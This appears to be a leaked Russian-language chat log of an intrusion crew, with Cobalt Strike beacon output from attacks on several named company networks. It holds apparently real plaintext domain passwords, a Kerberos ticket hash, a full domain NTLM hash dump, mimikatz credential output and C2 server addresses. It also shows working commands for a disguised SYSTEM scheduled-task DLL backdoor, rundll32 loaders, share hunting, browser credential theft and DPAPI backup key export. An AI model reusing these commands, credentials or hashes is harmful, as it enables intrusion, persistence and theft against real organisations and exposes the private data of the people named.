gophersport.local\symbackup rehpog2013!
gophersport.local\veeambackup rehpog2013!
gophersport.local\veeamone KA7KYbbmDC5LMmn
```зайди пока к @user4 тогдапроверь настройки листамы так и делалиага, дозапускались, что сесии отвалисья тебя так и запускалтак закинь его дллчет не летят сесии от user4а ты для @user9 не можешь заспавнить сессию, как мне делал?сейчас уточню времяпока готовых больше нет23.106.160.195 моя)``
CobaltStrike C2s on Port 443 - Pastebin.com
pastebin.com ' ...
34.233.187.38. 54.74.109.48. 209.159.207.46. 197.248.104.2. 152.160.171.27. 98.143.95.83. 64.139.73.173. 23.106.160.195. 205.201.245.170. 201.35.17.221.
```мне тоже наверно дай, а тоже процентов 20 притягиваетсялсно 4.2естьагатвоя?)ну и +)Есть читсые кобы?
моя видимо засветилась, не летят сессииuser9+Отпинговал серваки и армы. Нашел бэкапы. АД перснять не получается даже на ДК, но там, в основном, ничего не поменялось. Остается выяснить, что с виртуализацией, рассортировать серваки и можно закрывать - поэтому закажи билд, может сегодня и закроемда, тут уже все готово к след стадии)та я же дисинк снял)тут вон я скуль админа скинул
там стопудово ДА будет где-нибудь на скуль сервакетут уже вылез за пределы входной точки и хорошочем больше соберете себе пул работы на потом тем лучшеладноты пока сетку разбери до состояния ДАмы закрывать не будем``
kbhost2.korbel.com ESXI 5.5
kbhost1.korbel.com ESXI 5.5
colohost2.korbel.com ESXI 5.5
kbhost3.korbel.com ESXI 5.5
colohost1.korbel.com ESXI 5.5
kb-hqucs1.korbel.com Virtual Host Servers
vcenter.korbel.com VCENTER
``+ ав[ ](https://mediaeveryone.com/group/korbel-com?msg=xkdmqByZWcpbzcnan) да я пока креды сферы поищу``
$krb5tgs$23$sqladmin$korbel.com$MSSQLSvc/cognos2.korbel.com:1433$D6DDE7C0F99FCB13756285792EDA8ED3$19E792F0EFBA2B8C610528E69BD9AC8C6B08DB6328CFEF7727663276554C5A684D19AFFAE9B504DE89A500C8568987D17416CAECE119DF76ED6015480C3134042282134DFD9DBE2269F4C51C145BF58959A9C196A7F7737E70A867E6CA31E86812D44A7B392C007498BF83C3A34CF51C33B8D2900FA269B407C517E1FA4CC6FA474CE5F7E1CE0FA181B3BEECB1AC8C4740FF1044DAF8D6B2F2E7B2B13E2F4ED3B56F2118C0ABDDE393975F88FA099737CAC9021F3F1455BB3820A24317338774BD191F20DAD739A69387EEE72CD8451595303892DE8A0E2E9CFE7846330968B348D71737E272259EAF26737D536AC4A7B1021F0D9C8B3AE69EB27877311E4AB605876769263CC627649BA885B37A08A52FDD5D69040AEAAADB4E0B16C6A263666A72248B47C404855C874563A837BDAB7AF4C7066F6DCDA99D46A77EA9F5B228ABCAA100B33950CBD38C84EEA836362694C9D5DA0D06C134C1567AE79F0AF813D8564050EB083600D01E94453FC93E50CFFB13FC9E90B312EA43EC36C0F81D54B6F79B9B41D994AB38F8A1D1390F1C370EC2CF01089FBCEF031302F0AD3A9078636E158BF7F70FD51B796713A8F1704A545DB5B0629CFBFF9F314279A31E615281DFFCB70504379F0BD7792DA8940B222E9662AA32D245218C05A038D930BFB093D6A18D6A22BE91571EF775E74rfvbgt5
```можешь пока взять еще сетку в работезабери ток хешидавай)ок, пока сетку буду разбиратьну если бы не затупил, то на 3 минуты)да ладно как видишь делов на 3 минуты:skull_crossbones:молодецвседаэто уже новый да?```
Folder: \
TaskName Next Run Time Status
======================================== ====================== ===============
Adobe Acrobat Update Task 12/21/2020 1:00:00 PM Ready
AM Transformer Cube Builds 12/22/2020 6:00:00 AM Ready
Microsoft SvcRestartTask#23731 12/21/2020 12:56:24 PM Ready
``сделал?)и штаском под системоймаскируешь под каноничное имяв систем32 прячешьстарый дл удаляйудаляй этот штаск на той машинеизвиния тут тоже вспылилладнона серверепросто голова плывет, соряни из юзеро дирыона под юзероместь то естьокудаляй штаск``
Microsoft autoupdate#94110
```есть``
Microsoft autoupdate#94110 12/21/2020 12:51:30 PM Ready
``длка рандлом запускается и осздает сама таску``
Folder: \
TaskName Next Run Time Status
======================================== ====================== ===============
Adobe Acrobat Update Task 12/21/2020 1:00:00 PM Ready
AM Transformer Cube Builds 12/22/2020 6:00:00 AM Ready
Microsoft autoupdate#94110 12/21/2020 12:51:30 PM Ready
Folder: \Microsoft
TaskName Next Run Time Status
======================================== ====================== ===============
INFO: There are no scheduled tasks currently available at your access level.
Folder: \Microsoft\Configuration Manager
TaskName Next Run Time Status
======================================== ====================== ===============
Configuration Manager Health Evaluation 12/22/2020 12:09:37 AM Ready
Folder: \Microsoft\Microsoft Antimalware
TaskName Next Run Time Status
======================================== ====================== ===============
Microsoft Antimalware Scheduled Scan 12/26/2020 2:00:12 AM Ready
Folder: \Microsoft\Office
TaskName Next Run Time Status
======================================== ====================== ===============
Office 15 Subscription Heartbeat 12/22/2020 6:33:22 AM Could not start
Folder: \Microsoft\Windows
TaskName Next Run Time Status
======================================== ====================== ===============
INFO: There are no scheduled tasks currently available at your access level.
Folder: \Microsoft\Windows\Active Directory Rights Management Services Client
TaskName Next Run Time Status
======================================== ====================== ===============
AD RMS Rights Policy Template Management Disabled
AD RMS Rights Policy Template Management N/A Ready
Folder: \Microsoft\Windows\AppID
TaskName Next Run Time Status
======================================== ====================== ===============
PolicyConverter N/A Ready
VerifiedPublisherCertStoreCheck N/A Ready
Folder: \Microsoft\Windows\Application Experience
TaskName Next Run Time Status
======================================== ====================== ===============
AitAgent 12/22/2020 2:30:00 AM Ready
ProgramDataUpdater 12/22/2020 12:30:00 AM Ready
Folder: \Microsoft\Windows\Autochk
TaskName Next Run Time Status
======================================== ====================== ===============
Proxy N/A Ready
Folder: \Microsoft\Windows\CertificateServicesClient
TaskName Next Run Time Status
======================================== ====================== ===============
SystemTask N/A Ready
UserTask N/A Ready
UserTask-Roam Disabled
Folder: \Microsoft\Windows\Customer Experience Improvement Program
TaskName Next Run Time Status
======================================== ====================== ===============
Consolidator 12/21/2020 6:00:00 PM Could not start
KernelCeipTask 12/24/2020 3:30:00 AM Ready
UsbCeip 12/24/2020 1:30:00 AM Ready
Folder: \Microsoft\Windows\Customer Experience Improvement Program\Server
TaskName Next Run Time Status
======================================== ====================== ===============
ServerCeipAssistant 12/22/2020 1:56:36 PM Could not start
ServerRoleCollector 12/24/2020 12:54:11 AM Ready
ServerRoleUsageCollector 12/22/2020 7:21:00 PM Could not start
Folder: \Microsoft\Windows\Defrag
TaskName Next Run Time Status
======================================== ====================== ===============
ScheduledDefrag 12/23/2020 2:29:46 AM Ready
Folder: \Microsoft\Windows\MemoryDiagnostic
TaskName Next Run Time Status
======================================== ====================== ===============
CorruptionDetector N/A Ready
DecompressionFailureDetector N/A Ready
Folder: \Microsoft\Windows\MUI
TaskName Next Run Time Status
======================================== ====================== ===============
LPRemove N/A Ready
Folder: \Microsoft\Windows\Multimedia
TaskName Next Run Time Status
======================================== ====================== ===============
SystemSoundsService Disabled
Folder: \Microsoft\Windows\NetTrace
TaskName Next Run Time Status
======================================== ====================== ===============
GatherNetworkInfo N/A Ready
Folder: \Microsoft\Windows\PLA
TaskName Next Run Time Status
======================================== ====================== ===============
Server Manager Performance Monitor Disabled
Folder: \Microsoft\Windows\Power Efficiency Diagnostics
TaskName Next Run Time Status
======================================== ====================== ===============
AnalyzeSystem 12/29/2020 10:09:27 AM Ready
Folder: \Microsoft\Windows\RAC
TaskName Next Run Time Status
======================================== ====================== ===============
RacTask 12/21/2020 1:08:29 PM Ready
Folder: \Microsoft\Windows\Ras
TaskName Next Run Time Status
======================================== ====================== ===============
MobilityManager N/A Ready
Folder: \Microsoft\Windows\Registry
TaskName Next Run Time Status
======================================== ====================== ===============
RegIdleBackup 12/23/2020 12:22:55 AM Ready
Folder: \Microsoft\Windows\Server Manager
TaskName Next Run Time Status
======================================== ====================== ===============
CleanupOldPerfLogs N/A Ready
ServerManager N/A Ready
Folder: \Microsoft\Windows\SoftwareProtectionPlatform
TaskName Next Run Time Status
======================================== ====================== ===============
SvcRestartTask 12/21/2020 8:51:55 PM Ready
Folder: \Microsoft\Windows\Task Manager
TaskName Next Run Time Status
======================================== ====================== ===============
Daily Transformer Cube Builds Disabled
Interactive N/A Ready
Folder: \Microsoft\Windows\Tcpip
TaskName Next Run Time Status
======================================== ====================== ===============
IpAddressConflict1 N/A Ready
IpAddressConflict2 N/A Ready
Folder: \Microsoft\Windows\TextServicesFramework
TaskName Next Run Time Status
======================================== ====================== ===============
MsCtfMonitor N/A Ready
Folder: \Microsoft\Windows\Time Synchronization
TaskName Next Run Time Status
======================================== ====================== ===============
SynchronizeTime 12/27/2020 1:00:00 AM Ready
Folder: \Microsoft\Windows\UPnP
TaskName Next Run Time Status
======================================== ====================== ===============
UPnPHostConfig N/A Ready
Folder: \Microsoft\Windows\User Profile Service
TaskName Next Run Time Status
======================================== ====================== ===============
HiveUploadTask Disabled
Folder: \Microsoft\Windows\WDI
TaskName Next Run Time Status
======================================== ====================== ===============
ResolutionHost N/A Ready
Folder: \Microsoft\Windows\Windows Error Reporting
TaskName Next Run Time Status
======================================== ====================== ===============
QueueReporting N/A Ready
Folder: \Microsoft\Windows\Windows Filtering Platform
TaskName Next Run Time Status
======================================== ====================== ===============
BfeOnServiceStartTypeChange N/A Ready
Folder: \Microsoft\Windows\WindowsColorSystem
TaskName Next Run Time Status
======================================== ====================== ===============
Calibration Loader Disabled
Folder: \Microsoft\Windows\Wininet
TaskName Next Run Time Status
======================================== ====================== ===============
CacheTask N/A Ready
Folder: \OfficeSoftwareProtectionPlatform
TaskName Next Run Time Status
======================================== ====================== ===============
SvcRestartTask 12/21/2020 11:19:45 PM Ready
Folder: \Scheduled Server Reboots
TaskName Next Run Time Status
======================================== ====================== ===============
Reboot (on demand) N/A Ready
Scheduled Server Reboot 12/27/2020 9:45:00 PM Ready
Folder: \Symantec Endpoint Protection
TaskName Next Run Time Status
======================================== ====================== ===============
Symantec Endpoint Protection Error Analy N/A Ready
Symantec Endpoint Protection Error Proce 12/22/2020 2:47:08 AM Could not start
```покажи мне уже блядский штаск на той машине)НЕЛЬЗЯнельзя более одного раза запускатьты чуть не наебнул системууже дохуя раз сказал1 длл = 1 запускбоже блятькак ты и сказалдлку[ ](https://mediaeveryone.com/group/korbel-com?msg=BLQrQThiQ9uSkH3W9) ???запускаю штаскомскажи чточто ты блять делаешьминуту``
beacon> shell SCHTASKS /Create /u KORBEL\daniel.harvey_adm /p W3lcome? /tn "Microsoft autoupdate#98189" /tr "cmd.exe /c rundll32 c:\windows\system32\ds64gt.dll entryPoint" /sc onstart /RU SYSTEM
[*] Tasked beacon to run: SCHTASKS /Create /u KORBEL\daniel.harvey_adm /p W3lcome? /tn "Microsoft autoupdate#98189" /tr "cmd.exe /c rundll32 c:\windows\system32\ds64gt.dll entryPoint" /sc onstart /RU SYSTEM
[+] host called home, sent: 211 bytes
[+] received output:
ERROR: Invalid syntax. Cannot specify user name without specifying system name.
Type "SCHTASKS /?" for usage.
```кукукакие 15 минут?чет нихера не быстро)исправляй рещекосякэто косяк(вот что за хуйняа, бля...смотри schtasks /queryты запустил штаском?ТАМ ПРЯЧЕТСЯ В СИСТЕМ32 И ЗАПУСКАЕТСЯ ИЗ ПОД СИСТЕМ ПРАВты запускаешь на сервереты блять ДАвот что за хуйня,kznm что это?Запустил, проверяй
```
C:\Users\cognos\AppData\Local\Adobe\Acrobat\10.0\AdobeSysFnt01.dll
``x64сейчас дам дллшикарно, прыжок на сервак, и бекдор туда)малорик)ДА
```
* Username : daniel.harvey_adm
* Domain : KORBEL
* Password : W3lcome?
* Username : adaudit
* Domain : korbel
* Password : #aud1T#
* Username : ben.mandeville
* Domain : KORBEL
* Password : 1234qwerASDF!@#$
``шары смотри сразу
мб текущий пользак куда уметрастов нет``
The request will be processed at a domain controller for domain korbel.com.
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
adaudit agpm_admin barry.levine_adm
ben.mandeville_adm carol.macdonell_adm
daniel.harvey daniel.harvey_adm dcbackup
Honcho Jcomfort josue.gonzalez
josue.gonzalez_adm kbveeamadmin KB-WMI-Monitor
panuserID Russell.Bartson_adm SMSadmin
SMTP-Relay solarwindows SolarWinds-LDAP
sqlbackup switchscan tracy.mcmahan_adm
vcentersvc veeamadmin
The command completed successfully.
[+] received output:
The request will be processed at a domain controller for domain korbel.com.
Group name Enterprise Admins
Comment Designated administrators of the enterprise
Members
-------------------------------------------------------------------------------
adaudit carol.macdonell_adm daniel.harvey_adm
Honcho josue.gonzalez_adm Russell.Bartson_adm
SMSadmin SMTP-Relay sqlbackup
vcentersvc
The command completed successfully.
[+] received output:
The request will be processed at a domain controller for domain korbel.com.
Alias name administrators
Comment Members can fully administer the computer/domain
Members
-------------------------------------------------------------------------------
carol.macdonell
ContentSubmitters
Domain Admins
Enterprise Admins
Honcho
josue.gonzalez
SMTP Relay
Tmcmahan
tracy.mcmahan_adm
The command completed successfully.
```дая помогать пошел окда?пока оставь дамне дальше есть что колупать или идти помогать?говорю же просто живыевот всё``
beacon> portscan 10.1.10.0/16 445 icmp 1024
[*] Tasked beacon to scan ports 445 on 10.1.10.0/16
[+] host called home, sent: 93245 bytes
[+] received output:
(ICMP) Target '10.1.10.20' is alive. [read 8 bytes]
(ICMP) Target '10.1.10.1' is alive. [read 8 bytes]
(ICMP) Target '10.1.10.11' is alive. [read 8 bytes]
[+] received output:
(ICMP) Target '10.1.10.59' is alive. [read 8 bytes]
[+] received output:
(ICMP) Target '10.1.10.100' is alive. [read 8 bytes]
(ICMP) Target '10.1.10.103' is alive. [read 8 bytes]
(ICMP) Target '10.1.10.104' is alive. [read 8 bytes]
[+] received output:
(ICMP) Target '10.1.10.210' is alive. [read 8 bytes]
[+] received output:
(ICMP) Target '10.1.10.251' is alive. [read 8 bytes]
(ICMP) Target '10.1.10.240' is alive. [read 8 bytes]
(ICMP) Target '10.1.10.250' is alive. [read 8 bytes]
``портскан по /16 маскеокей тупой вопрос - как?
в офисе никто ответа не далпроверь есть ли воркгупы рядомну они чисто живи под 16 и всеу нас была 2416 маскучто?чет вчера такого не помнюдаicmp?поставить порт скан на /16 маскувон дцсинквон рассканмне что делать сейчас``
[i] Some weird software? Check for vulnerabilities in unknow software installed
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#software
7-Zip
Common Files
Common Files
Internet Explorer
Internet Explorer
Microsoft Office
Microsoft Office 15
Microsoft.NET
ModifiableWindowsApps
ossec-agent
Teams Installer
UNP
Velociraptor
Windows Defender
Windows Defender
Windows Defender Advanced Threat Protection
Windows Mail
Windows Mail
Windows Media Player
Windows Media Player
Windows Multimedia Platform
Windows Multimedia Platform
Windows NT
Windows NT
Windows Photo Viewer
Windows Photo Viewer
Windows Portable Devices
Windows Portable Devices
Windows Security
WindowsPowerShell
WindowsPowerShell
InstallLocation REG_SZ C:\Program Files\7-Zip\
InstallLocation REG_SZ C:\Program Files (x86)\Microsoft Office
```запустил и потом вспомнил, что там хрома то и нетшарпвеб кстати не снимет вроде Хром к сожалению
хром через шарпхром или мимиком надоещё до дкя делалэто без[ ](https://mediaeveryone.com/group/northerntrust-local?msg=GyqZZyrCNNsa7vude) ```
10.1.10.11:445 (platform: 500 version: 10.0 name: LENDING3 domain: NORTHERNTRUST)
10.1.10.20:445 (platform: 500 version: 10.0 name: FILE1 domain: NORTHERNTRUST)
10.1.10.59:445 (platform: 500 version: 10.0 name: ACC1 domain: NORTHERNTRUST)
10.1.10.100:445 (platform: 500 version: 10.0 name: HR1 domain: NORTHERNTRUST)
10.1.10.103:445 (platform: 500 version: 10.0 name: IT1 domain: NORTHERNTRUST)
10.1.10.104:445 (platform: 500 version: 10.0 name: LENDING1 domain: NORTHERNTRUST)
10.1.10.210:445 (platform: 500 version: 10.0 name: AUTOMATE1 domain: NORTHERNTRUST)
10.1.10.240:445 (platform: 500 version: 6.3 name: BACKUP1 domain: NORTHERNTRUST)
10.1.10.250:445 (platform: 500 version: 6.3 name: DC1 domain: NORTHERNTRUST)
10.1.10.251:445 (platform: 500 version: 10.0 name: DC3 domain: NORTHERNTRUST)
``````
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpWeb.exe all
[*] Tasked beacon to run .NET program: SharpWeb.exe all
[+] host called home, sent: 705073 bytes
[+] received output:
=== Chrome (All Users) ===
=== Checking for Firefox (All Users) ===
=== Checking Windows Vaults ===
```а дай дамп браузера с пк откуда начално без `icmp 1024`у меня есть портскан короче по 445у всех?там одна подсеть 10.1.10.0вспомниай)по 443 как вчера?делай рассканну у тебя трастдампа я не вижутак, теперь разбор нетворка, получается?
Вот из ад_комп все серваки
```
DC1.Northerntrust.local
DC3.Northerntrust.local
Automate1.Northerntrust.local
Backup1.Northerntrust.local
File1.Northerntrust.local
``[ ](https://mediaeveryone.com/group/northerntrust-local?msg=Z759CRfjaC2xtFvXv) делал как знаюофкбрутил?)``
'.\Administrator:Abcd1234!' Administrator
```у меня есть ДАя получил сессию на ДК@tl1 еуна``
[DC] 'Northerntrust.local' will be the domain
[DC] 'DC1.Northerntrust.local' will be the DC server
[DC] Exporting domain 'Northerntrust.local'
502 krbtgt 3dbe670716ca04f747c58e2410985c37 514
2107 rperkins 25c1c24f244b4b38ddd008f5e5e04dc5 512
2109 darmstrong dcd25a439cd39daa6baeb6c02e88a9e6 512
2110 pgardner 1b638783b0af77e01bcb54fac1c9e938 512
2113 vlane ae67ca4ce0dd712cf628575c9439651d 512
2114 jwalsh 0ea6bede65067837ca818ac7381b9ac9 512
2116 lbrewer e04b29f420b76b1de7405d42db33296e 512
2123 PRINTER1$ d71638bf9374e98d9bedc6b6c32de6fb 4128
2124 PRINTER2$ 9b3c84a8ab5f5e10fa062bb7b89dc3f0 4128
2125 HR3$ a88292f68cd62e0dff57c5edbdfad160 4128
2128 IT2$ 51de61363b4c3e0c3bc9dbf394b834ee 4128
2129 IT3$ eeb1b544374ad054be4c3a37f2409f46 4128
2132 security 55e9dd76e1b4c8cdef934988600ad2b4 66048
2133 MARKET1$ 78690dbb6c0526d278300c76bdf40c6d 4128
2134 MARKET2$ 5c6a44e156b5633fbc5822ce8cc3bfa9 4128
2135 MARKET3$ cd4a3826128079306a570a83fb359318 4128
2122 networkservices 774ec9de93bc164d7e7dd3f7022b9ddf 66048
2106 spayne ec4408935ee4d46b9c4093947015c410 512
2136 srivers c4b0e1b10c7ce2c4723b4e2407ef81a2 512
2137 boniel 33a09024bd0389b1ced865a291d0199c 512
2104 ghawkins acbfc03df96e93cf7294a01a6abbda33 66048
2138 LENDING4$ 6c13631c0d6b31fd187f4711fe223620 4096
1105 AUTOMATE1$ 82d4822fd7edb2932db2525042d23ad6 4096
1104 DC3$ 0d24da494b1f4f15f4e6a79444e70f90 532480
1106 HR1$ 3c3ed7115e70468341b2f545d5d44639 4096
1109 LENDING1$ a934860dbc89364c28c4d2ada48dc792 4096
2102 IT1$ 6db2362e97d455705f3fdd235382ee14 4096
1107 ACC1$ 0d944ee41ec7b7fb57e41811519010d7 4096
2130 FILE1$ a488233c032861f97e34ba50b73b99fd 4096
1001 DC1$ 54c071b65d14c02a3f3ffc638b16c8b5 532480
1108 BACKUP1$ 2e2060b3b2eb7a0b61dcbf918ee498ac 4096
2127 LENDING3$ 102434085c8a288797aec02654f619e3 4128
2126 LENDING2$ 3c507247472925acf99b8c1fe532a645 4128
2105 ehart cef2eb521883d390b32b0b5bb916f7bb 66048
500 Administrator e20e81c5c06ccf288474c581f13423b9 512
2103 rbradley 64f12cddaa88057e06a81b54e73b949b 66048
3602 fgarbo 1d32ad40cecbc0419f99a08e0845dd66 66048
```вас 6 человек, гайды все естьладно, делай как знаешь)я понял, в параметре hostlist?в шарфайндерев хост-листе то?указание дк?или...?не по хостлисту же пускатьв исходниках есть параметр, но с ним не отработало такжеи посмотри гит, мб там есть параметр прямого указания домена``
beacon> psinject 1636 x64 Invoke-ShareFinder -Domain Northerntrust.local | Out-File sharfindINFO.txt
[*] Tasked beacon to psinject: Invoke-ShareFinder -Domain Northerntrust.local | Out-File sharfindINFO.txt into 1636 (x64)
[+] host called home, sent: 133723 bytes
[+] received output:
ERROR: Exception calling "FindAll" with "0" argument(s): "The specified domain either does not exist or
ERROR: could not be contacted.
ERROR: "
ERROR: At line:849 char:9
ERROR: + $CompSearcher.FindAll() | ForEach-Object {
ERROR: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ERROR: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
ERROR: + FullyQualifiedErrorId : COMException
ERROR:
WARNING:
[!] No hosts found!
``аргументов не хватает``
beacon> psinject 1636 x64 Invoke-ShareFinder | Out-File sharfindINFO.txt
```кая команда былаговорит хзпо этой ошибке не спросилу тл какие ответы на месте``
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
[+] received output:
Northerntrust.local
``проверь домен, мб отключилиот домена не отрублен вродеShareFinder запустил, выкатило это, я так понимаю там нет шар :thinking:
```
[*] Tasked beacon to remove C:\Windows\Temp\wpinfo
[+] received output:
ERROR: Exception calling "FindAll" with "0" argument(s): "The specified domain either does not exist or
ERROR: could not be contacted.
ERROR: "
ERROR: At line:849 char:9
ERROR: + $CompSearcher.FindAll() | ForEach-Object {
ERROR: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ERROR: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
ERROR: + FullyQualifiedErrorId : COMException
ERROR:
WARNING:
[!] No hosts found!
```у вас вообще все)у вас гайды, у вас форум, у вас mindmapа когда у него идеи кончатся уже ко мнесамое время спросить у тимлида своего)брут? а? а? а?у меня идеи кончилисьдиск D нашёл, не открываетсяШуТкУю ПрИкОлЫне понялну не штаском жеад? ты же его уже сняли так есть с чем работатьокей делаю токен снимаю адда тут и брутить не надовсе имет смысл пока нет ДАокей локальных пользователей плюсом в брут закинуть будет иметь смысл?ну хд я после сделалвыше написалкак не упало кредов кроме текущего пользака то?[ ](https://mediaeveryone.com/group/northerntrust-local?msg=swYfpm9XBJ7NGMKpu) ?скорее всего системные аккитак это локальные пользователиих в ад_юзерс нет :thinking:+одинаковые пароли``
OOB:1003:aad3b435b51404eeaad3b435b51404ee:e20e81c5c06ccf288474c581f13423b9:::
setup:1001:aad3b435b51404eeaad3b435b51404ee:e20e81c5c06ccf288474c581f13423b9:::
``````
setup:1001:aad3b435b51404eeaad3b435b51404ee:e20e81c5c06ccf288474c581f13423b9:::Abcd1234!
``````
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
OOB:1003:aad3b435b51404eeaad3b435b51404ee:e20e81c5c06ccf288474c581f13423b9:::
setup:1001:aad3b435b51404eeaad3b435b51404ee:e20e81c5c06ccf288474c581f13423b9:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:ae49429db3a99d5b0af02187c1873deb:::
```нужна подсказка по векторам, мне никаких кредов упало кроме нтлм хэша текущего пользователя, он на своей тачке ЛА, но там мало полезного
его машина состоит в OU=Lending
есть ещё такие тачки, имет смысл пингануть их и брутануть на предмет ЛА?``
Domain Controllers:
Server Name IP Address
----------- ----------
DC1 10.1.10.250
DC3 10.1.10.251
``````
Authentication Id : 0 ; 49752863 (000000:02f72b1f)
Session : Interactive from 2
User Name : fgarbo
Domain : NORTHERNTRUST
Logon Server : DC1
Logon Time : 10/3/2020 9:56:59 AM
SID : S-1-5-21-1968562247-2146563082-3767082923-3602
msv :
[00000003] Primary
* Username : fgarbo
* Domain : NORTHERNTRUST
* NTLM : 1d32ad40cecbc0419f99a08e0845dd66
* SHA1 : eeb76229fed887393f7880b224edf87683e69dd3
* DPAPI: 532039ed13c7c6b6d3b3986a446888e4
tspkg:
wdigest:
* Username : fgarbo
* Domain : NORTHERNTRUST
* Password : (null)
kerberos :
* Username : fgarbo
* Domain : NORTHERNTRUST.LOCAL
* Password : (null)
ssp :
credman:
Authentication Id: 0; 49752778 (000000:02f72aca)
Session : Interactive from 2
User Name : fgarbo
Domain : NORTHERNTRUST
Logon Server : DC1
Logon Time : 10/3/2020 9:56:59 AM
SID : S-1-5-21-1968562247-2146563082-3767082923-3602
msv :
[00000003] Primary
* Username : fgarbo
* Domain : NORTHERNTRUST
* NTLM : 1d32ad40cecbc0419f99a08e0845dd66
* SHA1 : eeb76229fed887393f7880b224edf87683e69dd3
* DPAPI: 532039ed13c7c6b6d3b3986a446888e4
tspkg:
wdigest:
* Username : fgarbo
* Domain : NORTHERNTRUST
* Password : (null)
kerberos :
* Username : fgarbo
* Domain : NORTHERNTRUST.LOCAL
* Password : (null)
ssp :
credman:
Authentication Id: 0; 49665170 (000000:02f5d492)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 10/3/2020 9:56:39 AM
SID : S-1-5-90-0-2
SV :
[00000003] Primary
* Username : LENDING3$
* Domain : NORTHERNTRUST
* NTLM : 102434085c8a288797aec02654f619e3
* SHA1 : ce51afe3ab35b5e630f28da5f0f36a507b30e2bf
tspkg:
wdigest:
* Username : LENDING3$
* Domain : NORTHERNTRUST
* Password : (null)
kerberos :
* Username : LENDING3$
* Domain : Northerntrust.local
* Password : Y*]ozx%Vn)_$N%@t0+9SfI[##r8_XVQFz<67Q<[,s*zd9kQDG Encrypted Key found in local state file
> Encrypted Key seems to be protected by DPAPI
URL : https://www.pizzahut.com/ ( https://www.pizzahut.com/index.php )
Username : uzxmvlcsyosjluxudo@upived.online
ERROR kuhl_m_dpapi_chrome_decrypt ; No Alg and/or Key handle despite AES encryption
``https://github.com/twelvesec/passcathttps://github.com/djhohnstein/SharpChromiumпопробовал с открытым и с закрытым браузером на всякийне нашелвсе. не один не подошел(найдет твои доступы?`https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-VaultCredential.ps1`да\дапш включен?точно сохранила, понялпросто зарегайся типо и сохрани доступы в браузеренедоступы чего? с мимика?и сохрани доступы где нибудьпоставь плизнет, но скачать не проблема)у тебя на дедике есть едж?у меня так же(```
URL : https://norex.growthzoneapp.com/ ( https://norex.growthzoneapp.com/ap/Events/Register/yr4Y1Rop )
Username : mattpeterson@gophersport.com
ERROR kuhl_m_dpapi_chrome_decrypt ; No Alg and/or Key handle despite AES encryption
``чет не подошел ни один ключ(пока нетникто не подошел?2 осталоськак там дела у @user4 ?уже не вижу)а неу меня через f7ae192f-64d6-41fa-a58a-ab726048ad7bлол[ ](https://mediaeveryone.com/group/gophersport-com?msg=Mns5nepoJGuGZKiyn) этону я на все сделалчерез какой гуид?
через этот -``
f7ae192f-64d6-41fa-a58a-ab726048ad7b
```
или что ты имеешь ввиду?это ты через какой?``
[domainkey] with RSA private key
key : 75597592e90e408290b2e532ed2015557eec0d4296b4517babd2e9ac26c4599cb1b23e13a3a0ba08e5ea951c69a6d773e629a37837db02ddbbf449c207bb960e
sha1: adf71515a86e4350f103949a74d8ab9cace0237b
sid: S-1-5-21-1434170147-1247748403-2213390517-18832
``````
sha1: 3271ea02988401e642deda7ca35b0503ec2ba7d1
sha1: f3f2faac309b0dfa98170f1a472493c7c42e0a3c
sha1: 3a048c41afa9f7d99d80a8c3b4d894f165a2f8fa
sha1: 5fc489d886bdceb4279e553361552c9910bc3d41
sha1: 0aa6cd2493ace9e5a41a22989b9cab7bfe93c857
sha1: adf71515a86e4350f103949a74d8ab9cace0237b
``все 6 перебери и скинь результатпроверь сначала это``
mimikatz # dpapi::masterkey /in:b8854128-023c-433d-aac9-232b4bca414c /pvk:ntds_capi_0_32d021e7-ab1c-4877-af06-80473ca3e4d8.pvk
``только бэкап логиндаты сделайсид останется одини просто перебери 6 гуидов)качай все файлы + самый свежий мимик на дедиктут даже попроще+нам надо их подкинуть на дедик и там расшифвровать как я понял
и + надо знать под каким гуидом он ходил в ейджзабрал его гуидына скрине 1190у нас около 1кбда вроде 1 и тот жеслишком маленькийему .pvk нужен, а там какой-то не такой .pvkчистизабирай файлыбуду знатьда, я просто потер те файлы, хотел в другой папке выгрузить ключон меня понял)[ ](https://mediaeveryone.com/group/gophersport-com?msg=5z4u65pjDnrgX6Qs8) ты про чтотакая шляпа сильно шумит1 раза бы хватилобольше так не делайбеза логины с доменом писать?)а не. проперделся))и вот так, а дальше никак:zany_face:читер)агаи оттуда же на сам дк сделал?ты прям на дк открыл сессиюну вот и у меня были, а на дк сработалоу меня были ошибкикак?на дк z1ad2``
beacon> mimikatz !lsadump::backupkeys /system:z1ad2.gophersport.local /export
[Tasked beacon to run mimikatz's !lsadump::backupkeys /system:z1ad2.gophersport.local /export command
[+] host called home, sent: 706126 bytes
[+] received output:
Current preferred key: {90818d1b-d373-4b74-b25c-76385e8c2987}
* RSA key
|Provider name : Microsoft Strong Cryptographic Provider
|Unique name :
|Implementation: CRYPT_IMPL_SOFTWARE ;
Algorithm : CALG_RSA_KEYX
Key size : 2048 (0x00000800)
Key permissions: 0000003f ( CRYPT_ENCRYPT ; CRYPT_DECRYPT ; CRYPT_EXPORT ; CRYPT_READ ; CRYPT_WRITE ; CRYPT_MAC ; )
Exportable key : YES
Private export : OK - 'ntds_capi_0_90818d1b-d373-4b74-b25c-76385e8c2987.keyx.rsa.pvk'
PFX container : OK - 'ntds_capi_0_90818d1b-d373-4b74-b25c-76385e8c2987.pfx'
Export : OK - 'ntds_capi_0_90818d1b-d373-4b74-b25c-76385e8c2987.der'
Compatibility preferred key: {bceb968a-8d19-4055-874d-2a38a1e7c2e6}
* Legacy key
